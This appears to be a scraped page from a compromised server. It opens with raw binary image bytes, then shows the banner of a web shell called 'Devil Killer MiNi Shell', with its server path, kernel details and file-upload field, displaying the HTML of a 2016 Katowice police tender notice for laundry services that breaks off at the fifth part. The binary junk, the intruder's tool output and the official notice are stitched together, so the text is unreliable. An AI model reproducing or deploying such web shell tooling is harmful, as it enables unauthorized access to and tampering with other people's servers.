JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160202/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160202/22356-N-2016.html

<p class="kh_header"><b>Katowice: ZP-2380-19-34/2016 Świadczenie kompleksowej usługi pralniczej</b><br>
<b>Numer ogłoszenia: 22356 - 2016; data zamieszczenia: 02.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Wojewódzka Policji w Katowicach , ul. J. Lompy 19, 40-038 Katowice, woj. śląskie, tel. 032 2002050, faks 032 2002060.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.katowice.kwp.policja.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZP-2380-19-34/2016 Świadczenie kompleksowej usługi pralniczej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest Świadczenie kompleksowej usługi pralniczej w podziale na 5 n/w zadań
Zadanie 1 - Świadczenie kompleksowej usługi pralniczej dla KMP Częstochowa
Zadanie 2 - Świadczenie kompleksowej usługi pralniczej dla KPP Lubliniec
Zadanie 3 - Świadczenie kompleksowej usługi pralniczej dla KPP Racibórz
Zadanie 4 - Świadczenie kompleksowej usługi pralniczej dla KPP Żywiec
Zadanie 5 - Świadczenie kompleksowej usługi pralniczej dla SPPP Częstochowa
2. Szczegółowy opis przedmiotu zamówienia, szacowane ilość prań dla poszczególnych zadań oraz miejsca realizacji usług zostały wskazane w załączniku nr 2 do SIWZ- formularz cenowy.
- Odbiór brudnych przedmiotów, przywóz czystych odbywać się będzie na koszt Wykonawcy
- Odbiór brudnych przedmiotów odbywać się będzie po wcześniejszym zgłoszeniu telefonicznym (w terminie maksymalnie 3 dni roboczych od dnia otrzymania zgłoszenia).
-Odbiór brudnych przedmiotów oraz przywóz czystych odbywać się będzie w terminach wskazanych w załączniku nr 2 do SIWZ-formularz cenowy- dla danego zadania na które składana będzie oferta. 
- Podstawą przekazania prania będzie zlecenie (wzór stanowi załącznik nr 4 do SIWZ)
- Zabezpieczenie czystej bielizny poprzez pakowanie w worki foliowe
- Transport bielizny i przedmiotów mundurowych samochodami posiadającymi wydzieloną część  brudną oraz czystą; mytymi                  i dezynfekowanymi z odpowiednią częstotliwością 
- Usługa pralnicza winna być świadczona zgodnie z obowiązującymi wymogami sanitarnymi i higienicznymi, jakie nakładane są na procesy prania.
3. Wykonawca może powierzyć wykonanie zamówienia podwykonawcom. Zamawiający wymaga od Wykonawcy  oświadczenia złożonego w załączniku nr 1 do SIWZ - formularzu ofertowym czy powierza podwykonawcy/com wykonanie zamówienia.                   4. W przypadku powierzenia podwykonawcy/com wykonania zamówienia Zamawiający wymaga wskazania jakie części zamówienia będzie realizował przy jego/ich udziale.
	UWAGA: Ilości usług określonych w załączniku nr 2 - formularz cenowy są ilościami szacunkowymi. Określona ilość danego asortymentu może ulec zmianie w trakcie realizacji umowy ze względu na zmniejszone bądź zwiększone zapotrzebowanie w zakresie przedmiotu zamówienia, którego Zamawiający w chwili rozpoczęcia postępowania nie mógł precyzyjnie przewidzieć. Maksymalna wartość umowy będzie opiewać na kwotę, jaką Zamawiający zamierza przeznaczyć na realizację zamówienia dla każdego zadania podaną na otwarciu ofert. Cenę brutto obliczoną wg pkt X SIWZ należy podać w celu wyboru najkorzystniejszej oferty..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 98.31.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2018.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie Wykonawcy złożone na formularzu ofertowym (zał. nr 1 do SIWZ), że:
      - będzie zabezpieczał czystą bieliznę poprzez pakowanie w worki foliowe
      - transport bielizny i przedmiotów mundurowych będzie odbywał się samochodami posiadającymi wydzieloną
        część  brudną oraz czystą; mytymi i dezynfekowanymi z odpowiednią częstotliwością,
      - usługa pralnicza będzie świadczona zgodnie z obowiązującymi wymogami  sanitarnymi i higienicznymi, jakie
        nakładane są na procesy prania.
- odbiór brudnych przedmiotów oraz przywóz czystych odbywać się będzie w terminach wskazanych w załączniku nr 2 do SIWZ- formularz cenowy- dla danego zadania na które składana będzie oferta.
2. Oświadczenie o terminie odbioru brudnych przedmiotów po zgłoszeniu telefonicznym przez zlecającego usługę złożone na formularzu ofertowym stanowiących załącznik nr 1 do SIWZ i załączniku nr 3 do SIWZ- formularzu cenowym.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - termin odbioru brudnych przedmiotów po zgłoszeniu telefonicznym przez zlecającego usługę - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Postanowienia dotyczące realizacji zamówienia są zawarte w załączniku nr 2 do SIWZ - projekt umowy.
2. Jednocześnie w myśl art. 144 ust. 1 ustawy Pzp Zamawiający dopuszcza możliwość zmian postanowień umowy w przypadku ustawowej zmiany stawki podatku VAT w czasie realizacji zamówienia, o wielkość tej stawki.
3. Dopuszcza się zmianę wysokości wynagrodzenia należnego Wykonawcy, w przypadku zmiany:
a) wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3 - 5 ustawy z dnia
10 października 2002r. o minimalnym wynagrodzeniu za pracę,
b) zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na
ubezpieczenia społeczne lub zdrowotne;
pod warunkiem wykazania przez Wykonawcę, że zmiany te mają wpływ na koszty wykonania zamówienia wraz
z pełnym uzasadnieniem i wskazaniem procentowego wzrostu tych cen. Jednocześnie Zamawiającemu będzie
przysługiwać prawo żądania dalszych wyjaśnień wraz z przedstawieniem dalszych dokumentów celem stwierdzenia
dopuszczalności zmiany cen za usługę prania.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.slaska.policja.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Komenda Wojewódzka
Policji w Katowicach, Zespół Zamówień Publicznych 40-038 Katowice ul. J. Lompy 19 blok A, parter.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.02.2016 godzina 10:00, miejsce: Komenda Wojewódzka Policji w Katowicach, Zespół Zamówień Publicznych 40-038
Katowice ul. J. Lompy 19 blok A, parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Świadczenie kompleksowej usługi pralniczej dla KMP Częstochowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Świadczenie kompleksowej usługi pralniczej dla KMP Częstochowa. 2. Szczegółowy opis przedmiotu zamówienia, szacowane ilość prań dla poszczególnych zadań oraz miejsca realizacji usług zostały wskazane w załączniku nr 2 do SIWZ- formularz cenowy.
- Odbiór brudnych przedmiotów, przywóz czystych odbywać się będzie na koszt Wykonawcy
- Odbiór brudnych przedmiotów odbywać się będzie po wcześniejszym zgłoszeniu telefonicznym (w terminie maksymalnie 3 dni roboczych od dnia otrzymania zgłoszenia).
-Odbiór brudnych przedmiotów oraz przywóz czystych odbywać się będzie w terminach wskazanych w załączniku nr 2 do SIWZ-formularz cenowy- dla danego zadania na które składana będzie oferta. 
- Podstawą przekazania prania będzie zlecenie (wzór stanowi załącznik nr 4 do SIWZ)
- Zabezpieczenie czystej bielizny poprzez pakowanie w worki foliowe
- Transport bielizny i przedmiotów mundurowych samochodami posiadającymi wydzieloną część  brudną oraz czystą; mytymi                  i dezynfekowanymi z odpowiednią częstotliwością 
- Usługa pralnicza winna być świadczona zgodnie z obowiązującymi wymogami sanitarnymi i higienicznymi, jakie nakładane są na procesy prania.
3. Wykonawca może powierzyć wykonanie zamówienia podwykonawcom. Zamawiający wymaga od Wykonawcy  oświadczenia złożonego w załączniku nr 1 do SIWZ - formularzu ofertowym czy powierza podwykonawcy/com wykonanie zamówienia.                   4. W przypadku powierzenia podwykonawcy/com wykonania zamówienia Zamawiający wymaga wskazania jakie części zamówienia będzie realizował przy jego/ich udziale.
	UWAGA: Ilości usług określonych w załączniku nr 2 - formularz cenowy są ilościami szacunkowymi. Określona ilość danego asortymentu może ulec zmianie w trakcie realizacji umowy ze względu na zmniejszone bądź zwiększone zapotrzebowanie w zakresie przedmiotu zamówienia, którego Zamawiający w chwili rozpoczęcia postępowania nie mógł precyzyjnie przewidzieć. Maksymalna wartość umowy będzie opiewać na kwotę, jaką Zamawiający zamierza przeznaczyć na realizację zamówienia dla każdego zadania podaną na otwarciu ofert. Cenę brutto obliczoną wg pkt X SIWZ należy podać w celu wyboru najkorzystniejszej oferty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 98.31.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2018.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin odbioru brudnych przedmiotów po zgłoszeniu telefonicznym przez zlecającego usługę - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Świadczenie kompleksowej usługi pralniczej dla KPP Lubliniec.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2. Szczegółowy opis przedmiotu zamówienia, szacowane ilość prań dla poszczególnych zadań oraz miejsca realizacji usług zostały wskazane w załączniku nr 2 do SIWZ- formularz cenowy.
- Odbiór brudnych przedmiotów, przywóz czystych odbywać się będzie na koszt Wykonawcy
- Odbiór brudnych przedmiotów odbywać się będzie po wcześniejszym zgłoszeniu telefonicznym (w terminie maksymalnie 3 dni roboczych od dnia otrzymania zgłoszenia).
-Odbiór brudnych przedmiotów oraz przywóz czystych odbywać się będzie w terminach wskazanych w załączniku nr 2 do SIWZ-formularz cenowy- dla danego zadania na które składana będzie oferta. 
- Podstawą przekazania prania będzie zlecenie (wzór stanowi załącznik nr 4 do SIWZ)
- Zabezpieczenie czystej bielizny poprzez pakowanie w worki foliowe
- Transport bielizny i przedmiotów mundurowych samochodami posiadającymi wydzieloną część  brudną oraz czystą; mytymi                  i dezynfekowanymi z odpowiednią częstotliwością 
- Usługa pralnicza winna być świadczona zgodnie z obowiązującymi wymogami sanitarnymi i higienicznymi, jakie nakładane są na procesy prania.
3. Wykonawca może powierzyć wykonanie zamówienia podwykonawcom. Zamawiający wymaga od Wykonawcy  oświadczenia złożonego w załączniku nr 1 do SIWZ - formularzu ofertowym czy powierza podwykonawcy/com wykonanie zamówienia.                   4. W przypadku powierzenia podwykonawcy/com wykonania zamówienia Zamawiający wymaga wskazania jakie części zamówienia będzie realizował przy jego/ich udziale.
	UWAGA: Ilości usług określonych w załączniku nr 2 - formularz cenowy są ilościami szacunkowymi. Określona ilość danego asortymentu może ulec zmianie w trakcie realizacji umowy ze względu na zmniejszone bądź zwiększone zapotrzebowanie w zakresie przedmiotu zamówienia, którego Zamawiający w chwili rozpoczęcia postępowania nie mógł precyzyjnie przewidzieć. Maksymalna wartość umowy będzie opiewać na kwotę, jaką Zamawiający zamierza przeznaczyć na realizację zamówienia dla każdego zadania podaną na otwarciu ofert. Cenę brutto obliczoną wg pkt X SIWZ należy podać w celu wyboru najkorzystniejszej oferty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 98.31.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2018.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin odbioru brudnych przedmiotów po zgłoszeniu telefonicznym przez zlecającego usługę - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Świadczenie kompleksowej usługi pralniczej dla KPP Racibórz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Świadczenie kompleksowej usługi pralniczej dla KPP Racibórz. 2. Szczegółowy opis przedmiotu zamówienia, szacowane ilość prań dla poszczególnych zadań oraz miejsca realizacji usług zostały wskazane w załączniku nr 2 do SIWZ- formularz cenowy.
- Odbiór brudnych przedmiotów, przywóz czystych odbywać się będzie na koszt Wykonawcy
- Odbiór brudnych przedmiotów odbywać się będzie po wcześniejszym zgłoszeniu telefonicznym (w terminie maksymalnie 3 dni roboczych od dnia otrzymania zgłoszenia).
-Odbiór brudnych przedmiotów oraz przywóz czystych odbywać się będzie w terminach wskazanych w załączniku nr 2 do SIWZ-formularz cenowy- dla danego zadania na które składana będzie oferta. 
- Podstawą przekazania prania będzie zlecenie (wzór stanowi załącznik nr 4 do SIWZ)
- Zabezpieczenie czystej bielizny poprzez pakowanie w worki foliowe
- Transport bielizny i przedmiotów mundurowych samochodami posiadającymi wydzieloną część  brudną oraz czystą; mytymi                  i dezynfekowanymi z odpowiednią częstotliwością 
- Usługa pralnicza winna być świadczona zgodnie z obowiązującymi wymogami sanitarnymi i higienicznymi, jakie nakładane są na procesy prania.
3. Wykonawca może powierzyć wykonanie zamówienia podwykonawcom. Zamawiający wymaga od Wykonawcy  oświadczenia złożonego w załączniku nr 1 do SIWZ - formularzu ofertowym czy powierza podwykonawcy/com wykonanie zamówienia.                   4. W przypadku powierzenia podwykonawcy/com wykonania zamówienia Zamawiający wymaga wskazania jakie części zamówienia będzie realizował przy jego/ich udziale.
	UWAGA: Ilości usług określonych w załączniku nr 2 - formularz cenowy są ilościami szacunkowymi. Określona ilość danego asortymentu może ulec zmianie w trakcie realizacji umowy ze względu na zmniejszone bądź zwiększone zapotrzebowanie w zakresie przedmiotu zamówienia, którego Zamawiający w chwili rozpoczęcia postępowania nie mógł precyzyjnie przewidzieć. Maksymalna wartość umowy będzie opiewać na kwotę, jaką Zamawiający zamierza przeznaczyć na realizację zamówienia dla każdego zadania podaną na otwarciu ofert. Cenę brutto obliczoną wg pkt X SIWZ należy podać w celu wyboru najkorzystniejszej oferty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 98.31.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2018.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin odbioru brudnych przedmiotów po zgłoszeniu telefonicznym przez zlecającego usługę - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Świadczenie kompleksowej usługi pralniczej dla KPP Żywiec.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Świadczenie kompleksowej usługi pralniczej dla KPP Żywiec. 2. Szczegółowy opis przedmiotu zamówienia, szacowane ilość prań dla poszczególnych zadań oraz miejsca realizacji usług zostały wskazane w załączniku nr 2 do SIWZ- formularz cenowy.
- Odbiór brudnych przedmiotów, przywóz czystych odbywać się będzie na koszt Wykonawcy
- Odbiór brudnych przedmiotów odbywać się będzie po wcześniejszym zgłoszeniu telefonicznym (w terminie maksymalnie 3 dni roboczych od dnia otrzymania zgłoszenia).
-Odbiór brudnych przedmiotów oraz przywóz czystych odbywać się będzie w terminach wskazanych w załączniku nr 2 do SIWZ-formularz cenowy- dla danego zadania na które składana będzie oferta. 
- Podstawą przekazania prania będzie zlecenie (wzór stanowi załącznik nr 4 do SIWZ)
- Zabezpieczenie czystej bielizny poprzez pakowanie w worki foliowe
- Transport bielizny i przedmiotów mundurowych samochodami posiadającymi wydzieloną część  brudną oraz czystą; mytymi                  i dezynfekowanymi z odpowiednią częstotliwością 
- Usługa pralnicza winna być świadczona zgodnie z obowiązującymi wymogami sanitarnymi i higienicznymi, jakie nakładane są na procesy prania.
3. Wykonawca może powierzyć wykonanie zamówienia podwykonawcom. Zamawiający wymaga od Wykonawcy  oświadczenia złożonego w załączniku nr 1 do SIWZ - formularzu ofertowym czy powierza podwykonawcy/com wykonanie zamówienia.                   4. W przypadku powierzenia podwykonawcy/com wykonania zamówienia Zamawiający wymaga wskazania jakie części zamówienia będzie realizował przy jego/ich udziale.
	UWAGA: Ilości usług określonych w załączniku nr 2 - formularz cenowy są ilościami szacunkowymi. Określona ilość danego asortymentu może ulec zmianie w trakcie realizacji umowy ze względu na zmniejszone bądź zwiększone zapotrzebowanie w zakresie przedmiotu zamówienia, którego Zamawiający w chwili rozpoczęcia postępowania nie mógł precyzyjnie przewidzieć. Maksymalna wartość umowy będzie opiewać na kwotę, jaką Zamawiający zamierza przeznaczyć na realizację zamówienia dla każdego zadania podaną na otwarciu ofert. Cenę brutto obliczoną wg pkt X SIWZ należy podać w celu wyboru najkorzystniejszej oferty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 98.31.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2018.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin odbioru brudnych przedmiotów po zgłoszeniu telefonicznym przez zlecającego usługę - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Świadczenie kompleksowej usługi pralniczej dla SPPP Częstochowa.</p>
